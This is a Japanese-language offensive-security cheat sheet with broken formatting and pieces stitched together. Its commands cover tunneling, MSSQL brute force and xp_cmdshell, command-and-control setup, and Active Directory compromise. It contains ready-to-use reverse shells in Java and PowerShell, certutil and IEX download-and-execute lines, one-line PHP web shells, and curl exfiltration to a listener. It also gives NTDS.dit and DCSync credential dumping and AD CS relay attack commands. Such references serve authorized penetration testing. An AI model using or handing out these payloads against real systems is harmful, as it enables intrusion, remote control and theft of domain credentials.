$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes $ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt
### ReDuhを使用して正しい形式のHTTPリクエストを介してTCP回線を作成する```
# https://github.com/sensepost/reDuh
# step 1
# upload reDuh.jsp to victim server
$ http://192.168.10.50/uploads/reDuh.jsp
# step 2
# run reDuhClient on attacker
$ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp
# step 3
# connecting to management port with nc
$ nc -nvv 127.0.0.1 1010
# step 4
# forward localport to remote port with tunnel
[createTunnel] 7777:172.16.0.4:3389
# step 5
# connect to localhost with rdp
$ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777
String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
# PowerShell リバースシェル
IPとポートを変更 / 制限版```
$sm=(New-Object Net.Sockets.TCPClient('192.168.1.11',9001)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
cmd /c certutil -urlcache -split -f http://127.0.0.1/shell.exe c:\Temp\shell.exe && C:\temp\shell.exe
powershell -v 2 -exec bypass IEX(New-Object Net.WebClient).downloadString("http://127.0.0.1/shell.ps1")
# MSSQL攻撃
## サービス発見
**Nmap**```
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
MetaSploit``` msf > use auxiliary/scanner/mssql/mssql_ping
列挙
他の方法で収集したユーザーパスワードを辞書にまとめ、ドメイン内のMSSQLマシンを列挙します。
**Nmap**```
nmap -n -sV -Pn -vv -p<PORT> --script=banner,ms-sql-empty-password,ms-sql-dac,ms-sql-dump-hashes,ms-sql-info,ms-sql-ntlm-info,vulners -oA <IP>_mssql.txt <IP>
nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=user.txt,passdb=pass.txt 192.168.1.1
nmap -p 1433 --script ms-sql-brute --script-args userdb=user.txt,passdb=pass.txt 192.168.1.1
Hydra
hydra -L userlist_sqlbrute.txt -P quick_password_spray.txt -f -o output.ms-sql -u <IP> -s <PORT>
MetaSploit``` msf > use auxiliary/admin/mssql/mssql_enum msf > use auxiliary/scanner/mssql/mssql_login Set it up PASS_FILE and RHOSTS.
**PowerUpSQL**```
Invoke-SQLAuditWeakLoginPw
FScrack``` python FScrack.py -h 192.168.1 -p 1433 -d pass.txt
## エクスプロイト
**Nmap**```
nmap -p 445 --script ms-sql-discover,ms-sql-empty-password,ms-sql-xp-cmdshell 192.168.1.10
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" 192.168.1.10
MetaSploit``` msf > auxiliary/admin/mssql/mssql_exec msf > auxiliary/admin/mssql/mssql_sql Rebound msf > use exploit/windows/mssql/mssql_payload msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
**MSDAT**
上記のすべては、MSDATのみを使用してテストできます。
<br>
シェルを取得する```
msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell
mssql_shell python script
python mssql_shell.py スクリプト``` Usage : mssql_shell Change MSSQL_SERVE , MSSQL_USERNAME and MSSQL_PASSWORD
**Sqsh**
<br>
サービスに接続する```
sqsh -S mssql -D MyDB -U DOMAIN\\testuser -P MyTestingClearPassword1
それから``` exec sp_configure ‘show advanced options’, 1 go reconfigure go exec sp_configure ‘xp_cmdshell’, 1 go reconfigure go xp_cmdshell 'dir C:' go
# C&C
## Merlin
サーバをコンパイルして実行```
$ cd merlin/cmd/merlinserver
$ go build
$ sudo ./merlinServer-Linux-x64 -i 192.168.1.11 -p 8443
エージェントのコンパイル``` $ cd merlin/cmd/merlinagent $ sudo GOOS=windows GOARCH=386 go build
証明書を生成```
$ cd merlin/data/x509
$ openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=lab.com" -days 365
$ cd koadic
$ ./koadic
/
_ _ | |
| | _____ __ _ | || | ___
| |/ / _ \ / |/ _ ||.| / __|
| / (o) | (| | (_| ||.|| (
||__^/ _,|_,||:| ___|
|:|
==8==/
8
O
-{ COM Command & Control }-
Windows Post-Exploitation Tools
Endless Intellect
~[ Version: 0xA ]~
~[ Stagers: 5 ]~
~[ Implants: 33 ]~
(koadic: sta/js/mshta)$ info
NAME VALUE REQ DESCRIPTION
----- ------------ ---- -------------
SRVHOST 192.168.1.11 yes Where the stager should call home
SRVPORT 9999 yes The port to listen for stagers on
EXPIRES no MM/DD/YYYY to stop calling home
KEYPATH no Private key for TLS communications
CERTPATH no Certificate for TLS communications
MODULE no Module to run once zombie is staged
(koadic: sta/js/mshta)$ set SRVPORT 1245 [+] SRVPORT => 1245 (koadic: sta/js/mshta)$ run [+] Spawned a stager at http://192.168.1.11:1245/c26qp [!] Don't edit this URL! (See: 'help portfwd') [>] mshta http://192.168.1.11:1245/c26qp
# PHP タイニーウェブシェル```
<?= ($_=@$_GET[0]).$_(@$_GET[1]); //http://127.0.0.1/shell.php?0=system&1=ls
<?=`$_GET[0]`?> //http://127.0.0.1/shell.php??0=command
bitsadmin /transfer mydownloadjob /download /priority normal ^http://example.com/filename.zip C:\Users\username\Downloads\filename.zip
# Internal Monolog
LSASS に触れずに NTLM ハッシュを取得する
https://github.com/eladshamir/Internal-Monologue
# NTDS - Domain Controller
NTDS.dit のダンプと列挙 - Active Directory ユーザーに関する情報(ハッシュ!)を含むファイル```
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
ハッシュのダンプ``` /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local
# ncを使った対話型シェル```
rlwrap nc -nlvp PORT
以下のトリックをRCE POCとして使用できます(一部のエンゲージメントでは、クライアントがRCE POCの限定的なテストを要求する場合があります)。
ペンテスターマシン```bash tcpdump -nni -e icmp[icmptype] == 8
エクスプロイト実行中```bash
ping <Attacker-IP>
-c オプションでpingの回数を指定できます。ICMPリクエストを受信した場合、RCEが達成されます。
コマンドを実行し、POSTリクエストでデータを受信します。```bash curl -d "$(id)" 127.0.0.1:9988
データを受け取る```bash
nc -nlvp 9988
burpcollaboratorをPOCとして使用
* Windows```bash
mshta <burp-collaborator.com>
Rubeus.exe asktgt /user: /certificate: /ptt Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
mimikatz> lsadump::dcsync /user:krbtgt
バージョン2: NTLM Relay + Mimikatz + Kekeo ```powershell impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
mimikatz> misc::efs /server:dc.lab.local /connect: /noauth
kekeo> base64 /input:on kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt
mimikatz> lsadump::dcsync /user:krbtgt
バージョン3: Kerberosリレー ```ps1
sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
バージョン4: ADCSPwn - ドメインコントローラ上で WebClient サービスの実行が必要です。デフォルトではこのサービスはインストールされていません。 ```powershell
https://github.com/bats3c/ADCSPwn
adcspwn.exe --adcs --port [local port] --remote [computer]
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcs - This is the address of the AD CS server which authentication will be relayed to. secure - Use HTTPS with the certificate service. port - The port ADCSPwn will listen on. remote - Remote machine to trigger authentication from. username - Username for non-domain context. password - Password for non-domain context. dc - Domain controller to query for Certificate Templates (LDAP). unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . output - Output path to store base64 generated crt.
バージョン5: Certipy ESC8 ```ps1 certipy relay -ca 172.16.19.100